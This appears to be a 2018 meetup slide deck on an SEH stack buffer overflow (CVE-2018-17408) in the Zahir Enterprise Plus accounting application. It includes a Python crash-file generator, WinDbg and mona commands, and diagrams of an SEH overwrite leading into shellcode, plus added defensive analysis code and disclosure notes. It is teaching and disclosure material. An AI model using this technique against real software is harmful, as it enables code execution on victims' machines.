Blinded Stack Overflow Exploit:
Just Another Common Technique
Thomas Gregory | Director and Partner at PT Spentera
tom@spentera.id | @modpr0be
Indonesian Bug Hunter Lounge Meetup 2018
Who we are
• Marie Muhammad
  • Security researcher
  • Penetration tester and Red team operator
  • Bug hunter
  • Holds OSCP, OSCE, CRTE
  • marie@spentera.id
  • @f3ci
  • Found the 0day
• Thomas Gregory
  • Director and Partner at Spentera
  • Cybersecurity Consultant
  • Vulnerability Discovery and 0day Exploit Development
  • Vulnerability Assessment and Penetration Testing
  • Metasploit framework exploit developer
  • Holds OSCP, OSCE, ISO 27001:2013 LA
  • tom@spentera.id
  • @modpr0be
  • Just exploiting further
Agenda
What
Zahir Enterprise Plus 6.05
Why
How
Fuzzing: Identifying Entry Points
• Zahir is a desktop client application, so one approach to identifying entry points is file format fuzzing.
• Identified entry points:
  • Menu Buka Data, a function to read from a local database or a Firebird database.
  • Menu Membuka File Backup, a function to open an existing backup.
  • Menu Import Data dari Zahir versi 6.0, a menu to open data from a previous Zahir version.
  • Menu Import Data dari file lainnya, a menu to open data from a CSV format file.
  • Menu Import Transaksi, a menu to open data from a CSV format file.
Fuzzing: Accidentally crashed!
Simple code to crash
#!/usr/bin/env python3
# Crafted CSV that triggered the crash: a long run of 'A' bytes, a line break,
# more 'A' filler and then a run of 'D' bytes (the 'D' run is what later shows
# up in the crash dump).
junk = "A" * 2500
junk += "\n\r"  # this is the CR/LF
junk += "A" * 500
junk += "D" * 500
print("[+] Preparing for file..")
filename = "junk.csv"
# Binary mode so the line break is written exactly as built, without newline translation.
with open(filename, "wb") as f:
    print("[+] Writing crafted CSV file..")
    f.write(junk.encode("ascii"))
print("[+] File %s written successfully.. bring it to Mr. Zahir." % filename)
Error and Crash
Exception Handler Kicked in
Replicate and Debug the app
Failed: Anti-debug implemented
At this point
• Modify the main program to bypass the anti-debug function
• Catch and dump the crash info, then analyse the crash dump
Crashdump analysis
Catch the crash with procdump
mkdir c:\crashdump
cd C:\tools\SysinternalsSuite
procdump.exe -ma -I C:\crashdump
(-ma writes a full memory dump; -I installs procdump as the post-mortem (AeDebug) debugger, so the crash is captured without attaching a debugger to the anti-debug protected process.)
Analyse the crash with windbg
File – Open Crash Dump
Analyse the crash with windbg
0:000> d 0012ec30
0012ec30 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012ec40 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012ec50 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012ec60 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012ec70 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012ec80 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012ec90 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012eca0 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0:000> !exchain
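The `d` listing above shows the stack around the fault filled with 0x44 ('D') bytes, the same fill byte used in the crafted CSV. The Python below is an added example, not code from the talk: it parses WinDbg `d` output and flags long runs of a single byte value, a quick triage heuristic for "the memory near the fault is file content, not program data". The dump text it runs on is constructed to match the slide's listing; the second, clean sample, the addresses and the 32-byte run threshold are assumptions.

```python
import re

# Constructed sample modelled on the slide's listing: 8 rows of 16 bytes, all 0x44 ('D').
SAMPLE_DUMP = "\n".join(
    "0012ec%02x 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD" % off
    for off in range(0x30, 0xb0, 0x10)
)

# Constructed sample of ordinary-looking stack contents (invented values) for comparison.
SAMPLE_CLEAN = "\n".join([
    "0012ec30 10 ec 12 00 a0 4f 40 00-ff ff ff ff 58 11 40 00 .....O@.....X.@.",
    "0012ec40 00 00 00 00 c8 ec 12 00-3c 5b 40 00 01 00 00 00 ........<[@.....",
])

# One WinDbg `d` row: 8-hex-digit address, 16 byte values separated by spaces and one '-'.
LINE_RE = re.compile(r"^([0-9a-fA-F]{8})\s+((?:[0-9a-fA-F]{2}[ -]){15}[0-9a-fA-F]{2})")


def parse_windbg_dump(text):
    """Turn WinDbg `d` output into a list of (address, bytes) rows; non-matching lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        addr = int(m.group(1), 16)
        hexpart = m.group(2).replace("-", " ")
        rows.append((addr, bytes(int(h, 16) for h in hexpart.split())))
    return rows


def fill_runs(rows, min_run=32):
    """Find runs of one repeated byte value of at least min_run bytes.
    Assumes the rows are contiguous, as they are in a single `d` listing."""
    data = b"".join(b for _, b in rows)
    base = rows[0][0] if rows else 0
    runs = []
    i = 0
    while i < len(data):
        j = i
        while j < len(data) and data[j] == data[i]:
            j += 1
        if j - i >= min_run:
            runs.append((base + i, j - i, data[i]))   # (start address, length, byte value)
        i = j
    return runs


def triage(text):
    """Summarise a dump: how much was parsed and whether it looks like a single-byte fill."""
    rows = parse_windbg_dump(text)
    runs = fill_runs(rows)
    return {
        "bytes_parsed": sum(len(b) for _, b in rows),
        "fill_runs": runs,
        "suspicious": bool(runs),
    }


if __name__ == "__main__":
    for name, sample in (("slide listing", SAMPLE_DUMP), ("clean stack", SAMPLE_CLEAN)):
        print(name, triage(sample))
```

A 128-byte run of 0x44 starting at 0012ec30 is reported for the slide's listing, while the mixed-byte sample produces no run; in a real triage the same check is worth running on the region `!exchain` points at, since an exception record overwritten by file content shows the same fill pattern.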
How SEH works
(1) Exception occurs ----------------------+
                                           |
                                           |
(3) Next SEH leads back into the SEH chain ------------------------------+
                                           |                             |
                                           V                             v
+------------------------------+ +--------+ +----------+ +--------+ +----------+
|AAAAAAAAAAAAAAAAAAAAA....AAAAA| |Next SEH| |SE Handler| |Next SEH| |SE Handler|
+------------------------------+ +--------+ +----------+ +--------+ +----------+
        Junk / buffer                ^            |
                                     |            |
                                     |            |
                                     +------------+
              (2) SE Handler leads back to the next SEH address
How SEH exploit works
(1) Exception occurs ----------------------+
                                           |
                                           |
(3) Next SEH leads back into the SEH chain ---------------------+
                                           |                   |
                                           V                   v
+------------------------------+ +--------+ +----------+ +--------------------------------+
|AAAAAAAAAAAAAAAAAAAAA....AAAAA| |Next SEH| |SE Handler| |DDDDDDDDDDDDDDDDDDDDDDDDDDD....D|
+------------------------------+ +--------+ +----------+ +--------------------------------+
        Junk / buffer                ^            |                  Shellcode
                                     |            | POP REG
                                     |            | POP REG
                                     |            | RETN
                                     |            |
                                     +------------+ (2) POP POP RET returns into the next SEH
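To make the chain mechanics in the two diagrams concrete, here is an added Python model of the x86 SEH chain together with an `!exchain`-style walk that applies integrity checks in the spirit of SEHOP (chain must be on the stack and move upward, no loops) and SafeSEH (handler must live in code). It is illustrative code, not from the talk or the product. Stack and code ranges, record addresses and handler values are all invented; the "overwritten" scenario reproduces only what the diagram shows, namely the Next SEH and SE Handler fields covered by 'D' bytes from the buffer.

```python
import struct

# All addresses and ranges are invented for the example (assumptions).
STACK_LO, STACK_HI = 0x00120000, 0x00130000     # assumed thread stack bounds
CODE_RANGES = [(0x00401000, 0x00450000)]        # assumed executable code ranges
END_OF_CHAIN = 0xFFFFFFFF                       # Next pointer of the last record


class Memory:
    """Tiny sparse byte-addressable memory so a chain can be laid out and overwritten."""

    def __init__(self):
        self.cells = {}

    def write(self, addr, data):
        for i, b in enumerate(data):
            self.cells[addr + i] = b

    def read32(self, addr):
        raw = bytes(self.cells.get(addr + i, 0) for i in range(4))
        return struct.unpack("<I", raw)[0]


def build_chain(mem, records):
    """Write EXCEPTION_REGISTRATION_RECORDs (Next, Handler) as two little-endian dwords each."""
    for addr, nxt, handler in records:
        mem.write(addr, struct.pack("<II", nxt, handler))


def walk_exchain(mem, head, max_depth=64):
    """Follow Next pointers from the chain head (what fs:[0] holds) like WinDbg's !exchain.
    Returns (entries, problem): entries is the list of (address, next, handler) seen,
    problem is None for an intact chain or a description of the first integrity failure."""
    seen = set()
    addr = head
    entries = []
    while addr != END_OF_CHAIN:
        if not (STACK_LO <= addr < STACK_HI - 8):
            return entries, "record at %#010x is outside the stack" % addr
        if addr in seen or len(entries) >= max_depth:
            return entries, "loop in chain at %#010x" % addr
        seen.add(addr)
        nxt, handler = mem.read32(addr), mem.read32(addr + 4)
        entries.append((addr, nxt, handler))
        if not any(lo <= handler < hi for lo, hi in CODE_RANGES):
            return entries, "handler %#010x at %#010x is not in a code section" % (handler, addr)
        if nxt != END_OF_CHAIN and nxt <= addr:
            return entries, "Next pointer %#010x at %#010x does not move up the stack" % (nxt, addr)
        addr = nxt
    return entries, None


def fresh_chain():
    """Two registration records, the first deeper in the stack than the second."""
    mem = Memory()
    build_chain(mem, [
        (0x0012EC00, 0x0012FF00, 0x00410100),
        (0x0012FF00, END_OF_CHAIN, 0x00420200),
    ])
    return mem


def intact_chain():
    return walk_exchain(fresh_chain(), 0x0012EC00)


def overwritten_chain():
    """As in the diagram: the buffer overrun covers Next SEH and SE Handler with 'D' bytes."""
    mem = fresh_chain()
    mem.write(0x0012EC00, b"D" * 8)
    return walk_exchain(mem, 0x0012EC00)


if __name__ == "__main__":
    print("intact:     ", intact_chain())
    print("overwritten:", overwritten_chain())
```

The intact walk lists both records and reports no problem; after the overrun the first record reads Next=0x44444444 and Handler=0x44444444, and the walk stops at the handler check. That is the same condition the dispatcher's protections are meant to catch: a handler address that is not in any module's code, which is why compiling with SafeSEH and enabling SEHOP (or building without the 32-bit SEH dependency at all) closes this exploitation route.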
Mona helpers during exploit development
# Load mona.py into WinDbg (through the pykd extension)
0:000> .load pykd.pyd
# Same as Metasploit pattern_create.rb and pattern_offset.rb
0:000> !py mona pc
0:000> !py mona po <offset>
# Compare memory for bad characters
0:000> !py mona ba -cpb '\x00'
0:000> !py mona cmp -f bytearray.bin -a <start address>
Exploit FTW!
Demo exploitation process..
Aftermath
• Mitigation
  • Don't process files with CSV extension from untrusted parties.
  • Double check if trusted parties provide files with CSV extension.
  • Always update the operating system and your endpoint security.
• Solution
  • There is no solution from Zahir at the moment.
• Vulnerability report
  • Zahir was contacted but there was no security-related response.
  • Submitted to the National Cyber Security Operation Center under the Indonesia National Cyber and Encryption Agency (BSSN).
  • Assigned CVE-2018-17408.
Thank you
Thomas Gregory
Director and Partner at PT Spentera
tom@spentera.id
